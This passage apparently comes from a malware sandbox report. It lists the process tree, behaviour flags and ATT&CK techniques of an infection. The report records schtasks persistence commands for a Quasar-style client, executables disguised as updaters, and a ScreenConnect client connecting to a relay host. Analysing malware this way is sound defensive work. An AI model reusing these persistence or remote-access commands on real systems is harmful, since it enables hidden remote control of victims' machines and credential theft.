        
        PID:6160
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djL4mZSxGqbH.bat" "
        13⤵
        
        PID:7008
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:6280
    - - C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
        5⤵
        
        PID:1820
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5672
      - C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
        
        "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
        6⤵
        
        PID:5600
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qINjSkmuD2rC.bat" "
        7⤵
        
        PID:3760
    - - C:\Users\Admin\AppData\Local\Temp\a\mac.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\mac.exe"
        5⤵
        
        PID:3104
    - - C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
        5⤵
        
        PID:4300
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3568

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1908
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2631F3A5ED7A619348012EEAA545765A C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3656
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI9961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240622046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4612
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5048
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5A37E0C1925822AEE5590D3C807DBE45
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3668
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D34D94C2F8247F382BC272F87252DD04 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:4716

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:2452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:4140

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4960 -ip 4960
1⤵
PID:388

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=950eb78c-2c84-4723-905f-38bbae3d8637&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3828
- C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "5a90cb36-beed-4e91-9d1b-239c4c15e943" "User"
  2⤵
  - Executes dropped EXE
  PID:1540
- C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "a05df4b3-0bf3-4672-9c60-df41b7f22039" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:5084

C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
1⤵
- Executes dropped EXE
PID:5792

C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
1⤵
PID:1920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5584 -ip 5584
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6288 -ip 6288
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1172 -ip 1172
1⤵
PID:6200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery